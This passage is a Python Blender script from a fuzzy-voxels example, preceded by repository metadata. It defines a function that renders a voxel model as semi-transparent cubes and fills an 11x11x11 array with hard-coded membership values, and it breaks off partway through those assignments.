| 36.79803 | 78 | 0.601071 | 798 | 7,470 | 5.481203 | 0.134085 | 0.028807 | 0.069959 | 0.076818 | 0.782579 | 0.742341 | 0.722679 | 0.706447 | 0.701646 | 0.685871 | 0 | 0.004776 | 0.299331 | 7,470 | 202 | 79 | 36.980198 | 0.830913 | 0.034672 | 0 | 0.659574 | 0 | 0 | 0.060539 | 0 | 0 | 0 | 0 | 0 | 0.106383 | 1 | 0.049645 | false | 0.078014 | 0.049645 | 0 | 0.106383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
227bd906c6afba5a3135961cdc318f0957d0dc4d | 23,913 | py | Python | examples/vm.py | oreuta/fuzzy-voxels | c3d684a7299cd8b9316a015353f71cce8e6ef1da | [
"MIT"
] | null | null | null | examples/vm.py | oreuta/fuzzy-voxels | c3d684a7299cd8b9316a015353f71cce8e6ef1da | [
"MIT"
] | null | null | null | examples/vm.py | oreuta/fuzzy-voxels | c3d684a7299cd8b9316a015353f71cce8e6ef1da | [
"MIT"
] | null | null | null | import numpy as np
import bpy
def draw_voxel_model(V, N, M, K, group_name='VM'):
g = bpy.data.groups.new(group_name)
mat_dict = dict()
Nh = N/2
Mh = M/2
Kh = K/2
for i in range(N):
for j in range(M):
for k in range(K):
p = V[i,j,k]
if p > 0:
mat_name = 'm'+str(p)[2:]
mat = bpy.data.materials.get(mat_name)
if mat is None:
mat = bpy.data.materials.new(mat_name)
mat.diffuse_color = (0.5,0.5,0.5)
mat.alpha = p
mat.use_transparency = True
bpy.ops.mesh.primitive_cube_add(location=(i+1/2-Nh, j+1/2-Mh, k+1/2-Kh))
v = bpy.context.active_object
v.dimensions = (1,1,1)
v.active_material = mat
v.show_transparent = True
g.objects.link(v)
return g
VM = np.zeros( (11, 11, 11), dtype=float)
VM[0,0,0] = 0.00
VM[1,0,0] = 0.00
VM[2,0,0] = 0.00
VM[3,0,0] = 0.00
VM[4,0,0] = 0.00
VM[5,0,0] = 0.00
VM[6,0,0] = 0.00
VM[7,0,0] = 0.00
VM[8,0,0] = 0.00
VM[9,0,0] = 0.00
VM[10,0,0] = 0.00
VM[0,1,0] = 0.00
VM[1,1,0] = 0.00
VM[2,1,0] = 0.00
VM[3,1,0] = 0.00
VM[4,1,0] = 0.00
VM[5,1,0] = 0.00
VM[6,1,0] = 0.00
VM[7,1,0] = 0.00
VM[8,1,0] = 0.00
VM[9,1,0] = 0.00
VM[10,1,0] = 0.00
VM[0,2,0] = 0.00
VM[1,2,0] = 0.00
VM[2,2,0] = 0.00
VM[3,2,0] = 0.00
VM[4,2,0] = 0.07
VM[5,2,0] = 0.14
VM[6,2,0] = 0.07
VM[7,2,0] = 0.00
VM[8,2,0] = 0.00
VM[9,2,0] = 0.00
VM[10,2,0] = 0.00
VM[0,3,0] = 0.00
VM[1,3,0] = 0.00
VM[2,3,0] = 0.00
VM[3,3,0] = 0.21
VM[4,3,0] = 0.52
VM[5,3,0] = 0.60
VM[6,3,0] = 0.52
VM[7,3,0] = 0.21
VM[8,3,0] = 0.00
VM[9,3,0] = 0.00
VM[10,3,0] = 0.00
VM[0,4,0] = 0.00
VM[1,4,0] = 0.00
VM[2,4,0] = 0.07
VM[3,4,0] = 0.52
VM[4,4,0] = 0.80
VM[5,4,0] = 0.90
VM[6,4,0] = 0.80
VM[7,4,0] = 0.52
VM[8,4,0] = 0.07
VM[9,4,0] = 0.00
VM[10,4,0] = 0.00
VM[0,5,0] = 0.00
VM[1,5,0] = 0.00
VM[2,5,0] = 0.14
VM[3,5,0] = 0.60
VM[4,5,0] = 0.90
VM[5,5,0] = 1.00
VM[6,5,0] = 0.90
VM[7,5,0] = 0.60
VM[8,5,0] = 0.14
VM[9,5,0] = 0.00
VM[10,5,0] = 0.00
VM[0,6,0] = 0.00
VM[1,6,0] = 0.00
VM[2,6,0] = 0.07
VM[3,6,0] = 0.52
VM[4,6,0] = 0.80
VM[5,6,0] = 0.90
VM[6,6,0] = 0.80
VM[7,6,0] = 0.52
VM[8,6,0] = 0.07
VM[9,6,0] = 0.00
VM[10,6,0] = 0.00
VM[0,7,0] = 0.00
VM[1,7,0] = 0.00
VM[2,7,0] = 0.00
VM[3,7,0] = 0.21
VM[4,7,0] = 0.52
VM[5,7,0] = 0.60
VM[6,7,0] = 0.52
VM[7,7,0] = 0.21
VM[8,7,0] = 0.00
VM[9,7,0] = 0.00
VM[10,7,0] = 0.00
VM[0,8,0] = 0.00
VM[1,8,0] = 0.00
VM[2,8,0] = 0.00
VM[3,8,0] = 0.00
VM[4,8,0] = 0.07
VM[5,8,0] = 0.14
VM[6,8,0] = 0.07
VM[7,8,0] = 0.00
VM[8,8,0] = 0.00
VM[9,8,0] = 0.00
VM[10,8,0] = 0.00
VM[0,9,0] = 0.00
VM[1,9,0] = 0.00
VM[2,9,0] = 0.00
VM[3,9,0] = 0.00
VM[4,9,0] = 0.00
VM[5,9,0] = 0.00
VM[6,9,0] = 0.00
VM[7,9,0] = 0.00
VM[8,9,0] = 0.00
VM[9,9,0] = 0.00
VM[10,9,0] = 0.00
VM[0,10,0] = 0.00
VM[1,10,0] = 0.00
VM[2,10,0] = 0.00
VM[3,10,0] = 0.00
VM[4,10,0] = 0.00
VM[5,10,0] = 0.00
VM[6,10,0] = 0.00
VM[7,10,0] = 0.00
VM[8,10,0] = 0.00
VM[9,10,0] = 0.00
VM[10,10,0] = 0.00
VM[0,0,1] = 0.00
VM[1,0,1] = 0.00
VM[2,0,1] = 0.00
VM[3,0,1] = 0.00
VM[4,0,1] = 0.00
VM[5,0,1] = 0.00
VM[6,0,1] = 0.00
VM[7,0,1] = 0.00
VM[8,0,1] = 0.00
VM[9,0,1] = 0.00
VM[10,0,1] = 0.00
VM[0,1,1] = 0.00
VM[1,1,1] = 0.00
VM[2,1,1] = 0.00
VM[3,1,1] = 0.04
VM[4,1,1] = 0.19
VM[5,1,1] = 0.24
VM[6,1,1] = 0.19
VM[7,1,1] = 0.04
VM[8,1,1] = 0.00
VM[9,1,1] = 0.00
VM[10,1,1] = 0.00
VM[0,2,1] = 0.00
VM[1,2,1] = 0.00
VM[2,2,1] = 0.14
VM[3,2,1] = 0.62
VM[4,2,1] = 0.91
VM[5,2,1] = 0.96
VM[6,2,1] = 0.91
VM[7,2,1] = 0.62
VM[8,2,1] = 0.14
VM[9,2,1] = 0.00
VM[10,2,1] = 0.00
VM[0,3,1] = 0.00
VM[1,3,1] = 0.04
VM[2,3,1] = 0.62
VM[3,3,1] = 0.99
VM[4,3,1] = 1.00
VM[5,3,1] = 1.00
VM[6,3,1] = 1.00
VM[7,3,1] = 0.99
VM[8,3,1] = 0.62
VM[9,3,1] = 0.04
VM[10,3,1] = 0.00
VM[0,4,1] = 0.00
VM[1,4,1] = 0.19
VM[2,4,1] = 0.91
VM[3,4,1] = 1.00
VM[4,4,1] = 1.00
VM[5,4,1] = 1.00
VM[6,4,1] = 1.00
VM[7,4,1] = 1.00
VM[8,4,1] = 0.91
VM[9,4,1] = 0.19
VM[10,4,1] = 0.00
VM[0,5,1] = 0.00
VM[1,5,1] = 0.24
VM[2,5,1] = 0.96
VM[3,5,1] = 1.00
VM[4,5,1] = 1.00
VM[5,5,1] = 1.00
VM[6,5,1] = 1.00
VM[7,5,1] = 1.00
VM[8,5,1] = 0.96
VM[9,5,1] = 0.24
VM[10,5,1] = 0.00
VM[0,6,1] = 0.00
VM[1,6,1] = 0.19
VM[2,6,1] = 0.91
VM[3,6,1] = 1.00
VM[4,6,1] = 1.00
VM[5,6,1] = 1.00
VM[6,6,1] = 1.00
VM[7,6,1] = 1.00
VM[8,6,1] = 0.91
VM[9,6,1] = 0.19
VM[10,6,1] = 0.00
VM[0,7,1] = 0.00
VM[1,7,1] = 0.04
VM[2,7,1] = 0.62
VM[3,7,1] = 0.99
VM[4,7,1] = 1.00
VM[5,7,1] = 1.00
VM[6,7,1] = 1.00
VM[7,7,1] = 0.99
VM[8,7,1] = 0.62
VM[9,7,1] = 0.04
VM[10,7,1] = 0.00
VM[0,8,1] = 0.00
VM[1,8,1] = 0.00
VM[2,8,1] = 0.14
VM[3,8,1] = 0.62
VM[4,8,1] = 0.91
VM[5,8,1] = 0.96
VM[6,8,1] = 0.91
VM[7,8,1] = 0.62
VM[8,8,1] = 0.14
VM[9,8,1] = 0.00
VM[10,8,1] = 0.00
VM[0,9,1] = 0.00
VM[1,9,1] = 0.00
VM[2,9,1] = 0.00
VM[3,9,1] = 0.04
VM[4,9,1] = 0.19
VM[5,9,1] = 0.24
VM[6,9,1] = 0.19
VM[7,9,1] = 0.04
VM[8,9,1] = 0.00
VM[9,9,1] = 0.00
VM[10,9,1] = 0.00
VM[0,10,1] = 0.00
VM[1,10,1] = 0.00
VM[2,10,1] = 0.00
VM[3,10,1] = 0.00
VM[4,10,1] = 0.00
VM[5,10,1] = 0.00
VM[6,10,1] = 0.00
VM[7,10,1] = 0.00
VM[8,10,1] = 0.00
VM[9,10,1] = 0.00
VM[10,10,1] = 0.00
VM[0,0,2] = 0.00
VM[1,0,2] = 0.00
VM[2,0,2] = 0.00
VM[3,0,2] = 0.00
VM[4,0,2] = 0.07
VM[5,0,2] = 0.14
VM[6,0,2] = 0.07
VM[7,0,2] = 0.00
VM[8,0,2] = 0.00
VM[9,0,2] = 0.00
VM[10,0,2] = 0.00
VM[0,1,2] = 0.00
VM[1,1,2] = 0.00
VM[2,1,2] = 0.14
VM[3,1,2] = 0.62
VM[4,1,2] = 0.91
VM[5,1,2] = 0.96
VM[6,1,2] = 0.91
VM[7,1,2] = 0.62
VM[8,1,2] = 0.14
VM[9,1,2] = 0.00
VM[10,1,2] = 0.00
VM[0,2,2] = 0.00
VM[1,2,2] = 0.14
VM[2,2,2] = 0.84
VM[3,2,2] = 1.00
VM[4,2,2] = 1.00
VM[5,2,2] = 1.00
VM[6,2,2] = 1.00
VM[7,2,2] = 1.00
VM[8,2,2] = 0.84
VM[9,2,2] = 0.14
VM[10,2,2] = 0.00
VM[0,3,2] = 0.00
VM[1,3,2] = 0.62
VM[2,3,2] = 1.00
VM[3,3,2] = 1.00
VM[4,3,2] = 1.00
VM[5,3,2] = 1.00
VM[6,3,2] = 1.00
VM[7,3,2] = 1.00
VM[8,3,2] = 1.00
VM[9,3,2] = 0.62
VM[10,3,2] = 0.00
VM[0,4,2] = 0.07
VM[1,4,2] = 0.91
VM[2,4,2] = 1.00
VM[3,4,2] = 1.00
VM[4,4,2] = 1.00
VM[5,4,2] = 1.00
VM[6,4,2] = 1.00
VM[7,4,2] = 1.00
VM[8,4,2] = 1.00
VM[9,4,2] = 0.91
VM[10,4,2] = 0.07
VM[0,5,2] = 0.14
VM[1,5,2] = 0.96
VM[2,5,2] = 1.00
VM[3,5,2] = 1.00
VM[4,5,2] = 1.00
VM[5,5,2] = 1.00
VM[6,5,2] = 1.00
VM[7,5,2] = 1.00
VM[8,5,2] = 1.00
VM[9,5,2] = 0.96
VM[10,5,2] = 0.14
VM[0,6,2] = 0.07
VM[1,6,2] = 0.91
VM[2,6,2] = 1.00
VM[3,6,2] = 1.00
VM[4,6,2] = 1.00
VM[5,6,2] = 1.00
VM[6,6,2] = 1.00
VM[7,6,2] = 1.00
VM[8,6,2] = 1.00
VM[9,6,2] = 0.91
VM[10,6,2] = 0.07
VM[0,7,2] = 0.00
VM[1,7,2] = 0.62
VM[2,7,2] = 1.00
VM[3,7,2] = 1.00
VM[4,7,2] = 1.00
VM[5,7,2] = 1.00
VM[6,7,2] = 1.00
VM[7,7,2] = 1.00
VM[8,7,2] = 1.00
VM[9,7,2] = 0.62
VM[10,7,2] = 0.00
VM[0,8,2] = 0.00
VM[1,8,2] = 0.14
VM[2,8,2] = 0.84
VM[3,8,2] = 1.00
VM[4,8,2] = 1.00
VM[5,8,2] = 1.00
VM[6,8,2] = 1.00
VM[7,8,2] = 1.00
VM[8,8,2] = 0.84
VM[9,8,2] = 0.14
VM[10,8,2] = 0.00
VM[0,9,2] = 0.00
VM[1,9,2] = 0.00
VM[2,9,2] = 0.14
VM[3,9,2] = 0.62
VM[4,9,2] = 0.91
VM[5,9,2] = 0.96
VM[6,9,2] = 0.91
VM[7,9,2] = 0.62
VM[8,9,2] = 0.14
VM[9,9,2] = 0.00
VM[10,9,2] = 0.00
VM[0,10,2] = 0.00
VM[1,10,2] = 0.00
VM[2,10,2] = 0.00
VM[3,10,2] = 0.00
VM[4,10,2] = 0.07
VM[5,10,2] = 0.14
VM[6,10,2] = 0.07
VM[7,10,2] = 0.00
VM[8,10,2] = 0.00
VM[9,10,2] = 0.00
VM[10,10,2] = 0.00
VM[0,0,3] = 0.00
VM[1,0,3] = 0.00
VM[2,0,3] = 0.00
VM[3,0,3] = 0.21
VM[4,0,3] = 0.52
VM[5,0,3] = 0.60
VM[6,0,3] = 0.52
VM[7,0,3] = 0.21
VM[8,0,3] = 0.00
VM[9,0,3] = 0.00
VM[10,0,3] = 0.00
VM[0,1,3] = 0.00
VM[1,1,3] = 0.04
VM[2,1,3] = 0.62
VM[3,1,3] = 0.99
VM[4,1,3] = 1.00
VM[5,1,3] = 1.00
VM[6,1,3] = 1.00
VM[7,1,3] = 0.99
VM[8,1,3] = 0.62
VM[9,1,3] = 0.04
VM[10,1,3] = 0.00
VM[0,2,3] = 0.00
VM[1,2,3] = 0.62
VM[2,2,3] = 1.00
VM[3,2,3] = 1.00
VM[4,2,3] = 1.00
VM[5,2,3] = 1.00
VM[6,2,3] = 1.00
VM[7,2,3] = 1.00
VM[8,2,3] = 1.00
VM[9,2,3] = 0.62
VM[10,2,3] = 0.00
VM[0,3,3] = 0.21
VM[1,3,3] = 0.99
VM[2,3,3] = 1.00
VM[3,3,3] = 1.00
VM[4,3,3] = 1.00
VM[5,3,3] = 1.00
VM[6,3,3] = 1.00
VM[7,3,3] = 1.00
VM[8,3,3] = 1.00
VM[9,3,3] = 0.99
VM[10,3,3] = 0.21
VM[0,4,3] = 0.52
VM[1,4,3] = 1.00
VM[2,4,3] = 1.00
VM[3,4,3] = 1.00
VM[4,4,3] = 1.00
VM[5,4,3] = 1.00
VM[6,4,3] = 1.00
VM[7,4,3] = 1.00
VM[8,4,3] = 1.00
VM[9,4,3] = 1.00
VM[10,4,3] = 0.52
VM[0,5,3] = 0.60
VM[1,5,3] = 1.00
VM[2,5,3] = 1.00
VM[3,5,3] = 1.00
VM[4,5,3] = 1.00
VM[5,5,3] = 1.00
VM[6,5,3] = 1.00
VM[7,5,3] = 1.00
VM[8,5,3] = 1.00
VM[9,5,3] = 1.00
VM[10,5,3] = 0.60
VM[0,6,3] = 0.52
VM[1,6,3] = 1.00
VM[2,6,3] = 1.00
VM[3,6,3] = 1.00
VM[4,6,3] = 1.00
VM[5,6,3] = 1.00
VM[6,6,3] = 1.00
VM[7,6,3] = 1.00
VM[8,6,3] = 1.00
VM[9,6,3] = 1.00
VM[10,6,3] = 0.52
VM[0,7,3] = 0.21
VM[1,7,3] = 0.99
VM[2,7,3] = 1.00
VM[3,7,3] = 1.00
VM[4,7,3] = 1.00
VM[5,7,3] = 1.00
VM[6,7,3] = 1.00
VM[7,7,3] = 1.00
VM[8,7,3] = 1.00
VM[9,7,3] = 0.99
VM[10,7,3] = 0.21
VM[0,8,3] = 0.00
VM[1,8,3] = 0.62
VM[2,8,3] = 1.00
VM[3,8,3] = 1.00
VM[4,8,3] = 1.00
VM[5,8,3] = 1.00
VM[6,8,3] = 1.00
VM[7,8,3] = 1.00
VM[8,8,3] = 1.00
VM[9,8,3] = 0.62
VM[10,8,3] = 0.00
VM[0,9,3] = 0.00
VM[1,9,3] = 0.04
VM[2,9,3] = 0.62
VM[3,9,3] = 0.99
VM[4,9,3] = 1.00
VM[5,9,3] = 1.00
VM[6,9,3] = 1.00
VM[7,9,3] = 0.99
VM[8,9,3] = 0.62
VM[9,9,3] = 0.04
VM[10,9,3] = 0.00
VM[0,10,3] = 0.00
VM[1,10,3] = 0.00
VM[2,10,3] = 0.00
VM[3,10,3] = 0.21
VM[4,10,3] = 0.52
VM[5,10,3] = 0.60
VM[6,10,3] = 0.52
VM[7,10,3] = 0.21
VM[8,10,3] = 0.00
VM[9,10,3] = 0.00
VM[10,10,3] = 0.00
VM[0,0,4] = 0.00
VM[1,0,4] = 0.00
VM[2,0,4] = 0.07
VM[3,0,4] = 0.52
VM[4,0,4] = 0.80
VM[5,0,4] = 0.90
VM[6,0,4] = 0.80
VM[7,0,4] = 0.52
VM[8,0,4] = 0.07
VM[9,0,4] = 0.00
VM[10,0,4] = 0.00
VM[0,1,4] = 0.00
VM[1,1,4] = 0.19
VM[2,1,4] = 0.91
VM[3,1,4] = 1.00
VM[4,1,4] = 1.00
VM[5,1,4] = 1.00
VM[6,1,4] = 1.00
VM[7,1,4] = 1.00
VM[8,1,4] = 0.91
VM[9,1,4] = 0.19
VM[10,1,4] = 0.00
VM[0,2,4] = 0.07
VM[1,2,4] = 0.91
VM[2,2,4] = 1.00
VM[3,2,4] = 1.00
VM[4,2,4] = 1.00
VM[5,2,4] = 1.00
VM[6,2,4] = 1.00
VM[7,2,4] = 1.00
VM[8,2,4] = 1.00
VM[9,2,4] = 0.91
VM[10,2,4] = 0.07
VM[0,3,4] = 0.52
VM[1,3,4] = 1.00
VM[2,3,4] = 1.00
VM[3,3,4] = 1.00
VM[4,3,4] = 1.00
VM[5,3,4] = 1.00
VM[6,3,4] = 1.00
VM[7,3,4] = 1.00
VM[8,3,4] = 1.00
VM[9,3,4] = 1.00
VM[10,3,4] = 0.52
VM[0,4,4] = 0.80
VM[1,4,4] = 1.00
VM[2,4,4] = 1.00
VM[3,4,4] = 1.00
VM[4,4,4] = 1.00
VM[5,4,4] = 1.00
VM[6,4,4] = 1.00
VM[7,4,4] = 1.00
VM[8,4,4] = 1.00
VM[9,4,4] = 1.00
VM[10,4,4] = 0.80
VM[0,5,4] = 0.90
VM[1,5,4] = 1.00
VM[2,5,4] = 1.00
VM[3,5,4] = 1.00
VM[4,5,4] = 1.00
VM[5,5,4] = 1.00
VM[6,5,4] = 1.00
VM[7,5,4] = 1.00
VM[8,5,4] = 1.00
VM[9,5,4] = 1.00
VM[10,5,4] = 0.90
VM[0,6,4] = 0.80
VM[1,6,4] = 1.00
VM[2,6,4] = 1.00
VM[3,6,4] = 1.00
VM[4,6,4] = 1.00
VM[5,6,4] = 1.00
VM[6,6,4] = 1.00
VM[7,6,4] = 1.00
VM[8,6,4] = 1.00
VM[9,6,4] = 1.00
VM[10,6,4] = 0.80
VM[0,7,4] = 0.52
VM[1,7,4] = 1.00
VM[2,7,4] = 1.00
VM[3,7,4] = 1.00
VM[4,7,4] = 1.00
VM[5,7,4] = 1.00
VM[6,7,4] = 1.00
VM[7,7,4] = 1.00
VM[8,7,4] = 1.00
VM[9,7,4] = 1.00
VM[10,7,4] = 0.52
VM[0,8,4] = 0.07
VM[1,8,4] = 0.91
VM[2,8,4] = 1.00
VM[3,8,4] = 1.00
VM[4,8,4] = 1.00
VM[5,8,4] = 1.00
VM[6,8,4] = 1.00
VM[7,8,4] = 1.00
VM[8,8,4] = 1.00
VM[9,8,4] = 0.91
VM[10,8,4] = 0.07
VM[0,9,4] = 0.00
VM[1,9,4] = 0.19
VM[2,9,4] = 0.91
VM[3,9,4] = 1.00
VM[4,9,4] = 1.00
VM[5,9,4] = 1.00
VM[6,9,4] = 1.00
VM[7,9,4] = 1.00
VM[8,9,4] = 0.91
VM[9,9,4] = 0.19
VM[10,9,4] = 0.00
VM[0,10,4] = 0.00
VM[1,10,4] = 0.00
VM[2,10,4] = 0.07
VM[3,10,4] = 0.52
VM[4,10,4] = 0.80
VM[5,10,4] = 0.90
VM[6,10,4] = 0.80
VM[7,10,4] = 0.52
VM[8,10,4] = 0.07
VM[9,10,4] = 0.00
VM[10,10,4] = 0.00
VM[0,0,5] = 0.00
VM[1,0,5] = 0.00
VM[2,0,5] = 0.14
VM[3,0,5] = 0.60
VM[4,0,5] = 0.90
VM[5,0,5] = 1.00
VM[6,0,5] = 0.90
VM[7,0,5] = 0.60
VM[8,0,5] = 0.14
VM[9,0,5] = 0.00
VM[10,0,5] = 0.00
VM[0,1,5] = 0.00
VM[1,1,5] = 0.24
VM[2,1,5] = 0.96
VM[3,1,5] = 1.00
VM[4,1,5] = 1.00
VM[5,1,5] = 1.00
VM[6,1,5] = 1.00
VM[7,1,5] = 1.00
VM[8,1,5] = 0.96
VM[9,1,5] = 0.24
VM[10,1,5] = 0.00
VM[0,2,5] = 0.14
VM[1,2,5] = 0.96
VM[2,2,5] = 1.00
VM[3,2,5] = 1.00
VM[4,2,5] = 1.00
VM[5,2,5] = 1.00
VM[6,2,5] = 1.00
VM[7,2,5] = 1.00
VM[8,2,5] = 1.00
VM[9,2,5] = 0.96
VM[10,2,5] = 0.14
VM[0,3,5] = 0.60
VM[1,3,5] = 1.00
VM[2,3,5] = 1.00
VM[3,3,5] = 1.00
VM[4,3,5] = 1.00
VM[5,3,5] = 1.00
VM[6,3,5] = 1.00
VM[7,3,5] = 1.00
VM[8,3,5] = 1.00
VM[9,3,5] = 1.00
VM[10,3,5] = 0.60
VM[0,4,5] = 0.90
VM[1,4,5] = 1.00
VM[2,4,5] = 1.00
VM[3,4,5] = 1.00
VM[4,4,5] = 1.00
VM[5,4,5] = 1.00
VM[6,4,5] = 1.00
VM[7,4,5] = 1.00
VM[8,4,5] = 1.00
VM[9,4,5] = 1.00
VM[10,4,5] = 0.90
VM[0,5,5] = 1.00
VM[1,5,5] = 1.00
VM[2,5,5] = 1.00
VM[3,5,5] = 1.00
VM[4,5,5] = 1.00
VM[5,5,5] = 1.00
VM[6,5,5] = 1.00
VM[7,5,5] = 1.00
VM[8,5,5] = 1.00
VM[9,5,5] = 1.00
VM[10,5,5] = 1.00
VM[0,6,5] = 0.90
VM[1,6,5] = 1.00
VM[2,6,5] = 1.00
VM[3,6,5] = 1.00
VM[4,6,5] = 1.00
VM[5,6,5] = 1.00
VM[6,6,5] = 1.00
VM[7,6,5] = 1.00
VM[8,6,5] = 1.00
VM[9,6,5] = 1.00
VM[10,6,5] = 0.90
VM[0,7,5] = 0.60
VM[1,7,5] = 1.00
VM[2,7,5] = 1.00
VM[3,7,5] = 1.00
VM[4,7,5] = 1.00
VM[5,7,5] = 1.00
VM[6,7,5] = 1.00
VM[7,7,5] = 1.00
VM[8,7,5] = 1.00
VM[9,7,5] = 1.00
VM[10,7,5] = 0.60
VM[0,8,5] = 0.14
VM[1,8,5] = 0.96
VM[2,8,5] = 1.00
VM[3,8,5] = 1.00
VM[4,8,5] = 1.00
VM[5,8,5] = 1.00
VM[6,8,5] = 1.00
VM[7,8,5] = 1.00
VM[8,8,5] = 1.00
VM[9,8,5] = 0.96
VM[10,8,5] = 0.14
VM[0,9,5] = 0.00
VM[1,9,5] = 0.24
VM[2,9,5] = 0.96
VM[3,9,5] = 1.00
VM[4,9,5] = 1.00
VM[5,9,5] = 1.00
VM[6,9,5] = 1.00
VM[7,9,5] = 1.00
VM[8,9,5] = 0.96
VM[9,9,5] = 0.24
VM[10,9,5] = 0.00
VM[0,10,5] = 0.00
VM[1,10,5] = 0.00
VM[2,10,5] = 0.14
VM[3,10,5] = 0.60
VM[4,10,5] = 0.90
VM[5,10,5] = 1.00
VM[6,10,5] = 0.90
VM[7,10,5] = 0.60
VM[8,10,5] = 0.14
VM[9,10,5] = 0.00
VM[10,10,5] = 0.00
VM[0,0,6] = 0.00
VM[1,0,6] = 0.00
VM[2,0,6] = 0.07
VM[3,0,6] = 0.52
VM[4,0,6] = 0.80
VM[5,0,6] = 0.90
VM[6,0,6] = 0.80
VM[7,0,6] = 0.52
VM[8,0,6] = 0.07
VM[9,0,6] = 0.00
VM[10,0,6] = 0.00
VM[0,1,6] = 0.00
VM[1,1,6] = 0.19
VM[2,1,6] = 0.91
VM[3,1,6] = 1.00
VM[4,1,6] = 1.00
VM[5,1,6] = 1.00
VM[6,1,6] = 1.00
VM[7,1,6] = 1.00
VM[8,1,6] = 0.91
VM[9,1,6] = 0.19
VM[10,1,6] = 0.00
VM[0,2,6] = 0.07
VM[1,2,6] = 0.91
VM[2,2,6] = 1.00
VM[3,2,6] = 1.00
VM[4,2,6] = 1.00
VM[5,2,6] = 1.00
VM[6,2,6] = 1.00
VM[7,2,6] = 1.00
VM[8,2,6] = 1.00
VM[9,2,6] = 0.91
VM[10,2,6] = 0.07
VM[0,3,6] = 0.52
VM[1,3,6] = 1.00
VM[2,3,6] = 1.00
VM[3,3,6] = 1.00
VM[4,3,6] = 1.00
VM[5,3,6] = 1.00
VM[6,3,6] = 1.00
VM[7,3,6] = 1.00
VM[8,3,6] = 1.00
VM[9,3,6] = 1.00
VM[10,3,6] = 0.52
VM[0,4,6] = 0.80
VM[1,4,6] = 1.00
VM[2,4,6] = 1.00
VM[3,4,6] = 1.00
VM[4,4,6] = 1.00
VM[5,4,6] = 1.00
VM[6,4,6] = 1.00
VM[7,4,6] = 1.00
VM[8,4,6] = 1.00
VM[9,4,6] = 1.00
VM[10,4,6] = 0.80
VM[0,5,6] = 0.90
VM[1,5,6] = 1.00
VM[2,5,6] = 1.00
VM[3,5,6] = 1.00
VM[4,5,6] = 1.00
VM[5,5,6] = 1.00
VM[6,5,6] = 1.00
VM[7,5,6] = 1.00
VM[8,5,6] = 1.00
VM[9,5,6] = 1.00
VM[10,5,6] = 0.90
VM[0,6,6] = 0.80
VM[1,6,6] = 1.00
VM[2,6,6] = 1.00
VM[3,6,6] = 1.00
VM[4,6,6] = 1.00
VM[5,6,6] = 1.00
VM[6,6,6] = 1.00
VM[7,6,6] = 1.00
VM[8,6,6] = 1.00
VM[9,6,6] = 1.00
VM[10,6,6] = 0.80
VM[0,7,6] = 0.52
VM[1,7,6] = 1.00
VM[2,7,6] = 1.00
VM[3,7,6] = 1.00
VM[4,7,6] = 1.00
VM[5,7,6] = 1.00
VM[6,7,6] = 1.00
VM[7,7,6] = 1.00
VM[8,7,6] = 1.00
VM[9,7,6] = 1.00
VM[10,7,6] = 0.52
VM[0,8,6] = 0.07
VM[1,8,6] = 0.91
VM[2,8,6] = 1.00
VM[3,8,6] = 1.00
VM[4,8,6] = 1.00
VM[5,8,6] = 1.00
VM[6,8,6] = 1.00
VM[7,8,6] = 1.00
VM[8,8,6] = 1.00
VM[9,8,6] = 0.91
VM[10,8,6] = 0.07
VM[0,9,6] = 0.00
VM[1,9,6] = 0.19
VM[2,9,6] = 0.91
VM[3,9,6] = 1.00
VM[4,9,6] = 1.00
VM[5,9,6] = 1.00
VM[6,9,6] = 1.00
VM[7,9,6] = 1.00
VM[8,9,6] = 0.91
VM[9,9,6] = 0.19
VM[10,9,6] = 0.00
VM[0,10,6] = 0.00
VM[1,10,6] = 0.00
VM[2,10,6] = 0.07
VM[3,10,6] = 0.52
VM[4,10,6] = 0.80
VM[5,10,6] = 0.90
VM[6,10,6] = 0.80
VM[7,10,6] = 0.52
VM[8,10,6] = 0.07
VM[9,10,6] = 0.00
VM[10,10,6] = 0.00
VM[0,0,7] = 0.00
VM[1,0,7] = 0.00
VM[2,0,7] = 0.00
VM[3,0,7] = 0.21
VM[4,0,7] = 0.52
VM[5,0,7] = 0.60
VM[6,0,7] = 0.52
VM[7,0,7] = 0.21
VM[8,0,7] = 0.00
VM[9,0,7] = 0.00
VM[10,0,7] = 0.00
VM[0,1,7] = 0.00
VM[1,1,7] = 0.04
VM[2,1,7] = 0.62
VM[3,1,7] = 0.99
VM[4,1,7] = 1.00
VM[5,1,7] = 1.00
VM[6,1,7] = 1.00
VM[7,1,7] = 0.99
VM[8,1,7] = 0.62
VM[9,1,7] = 0.04
VM[10,1,7] = 0.00
VM[0,2,7] = 0.00
VM[1,2,7] = 0.62
VM[2,2,7] = 1.00
VM[3,2,7] = 1.00
VM[4,2,7] = 1.00
VM[5,2,7] = 1.00
VM[6,2,7] = 1.00
VM[7,2,7] = 1.00
VM[8,2,7] = 1.00
VM[9,2,7] = 0.62
VM[10,2,7] = 0.00
VM[0,3,7] = 0.21
VM[1,3,7] = 0.99
VM[2,3,7] = 1.00
VM[3,3,7] = 1.00
VM[4,3,7] = 1.00
VM[5,3,7] = 1.00
VM[6,3,7] = 1.00
VM[7,3,7] = 1.00
VM[8,3,7] = 1.00
VM[9,3,7] = 0.99
VM[10,3,7] = 0.21
VM[0,4,7] = 0.52
VM[1,4,7] = 1.00
VM[2,4,7] = 1.00
VM[3,4,7] = 1.00
VM[4,4,7] = 1.00
VM[5,4,7] = 1.00
VM[6,4,7] = 1.00
VM[7,4,7] = 1.00
VM[8,4,7] = 1.00
VM[9,4,7] = 1.00
VM[10,4,7] = 0.52
VM[0,5,7] = 0.60
VM[1,5,7] = 1.00
VM[2,5,7] = 1.00
VM[3,5,7] = 1.00
VM[4,5,7] = 1.00
VM[5,5,7] = 1.00
VM[6,5,7] = 1.00
VM[7,5,7] = 1.00
VM[8,5,7] = 1.00
VM[9,5,7] = 1.00
VM[10,5,7] = 0.60
VM[0,6,7] = 0.52
VM[1,6,7] = 1.00
VM[2,6,7] = 1.00
VM[3,6,7] = 1.00
VM[4,6,7] = 1.00
VM[5,6,7] = 1.00
VM[6,6,7] = 1.00
VM[7,6,7] = 1.00
VM[8,6,7] = 1.00
VM[9,6,7] = 1.00
VM[10,6,7] = 0.52
VM[0,7,7] = 0.21
VM[1,7,7] = 0.99
VM[2,7,7] = 1.00
VM[3,7,7] = 1.00
VM[4,7,7] = 1.00
VM[5,7,7] = 1.00
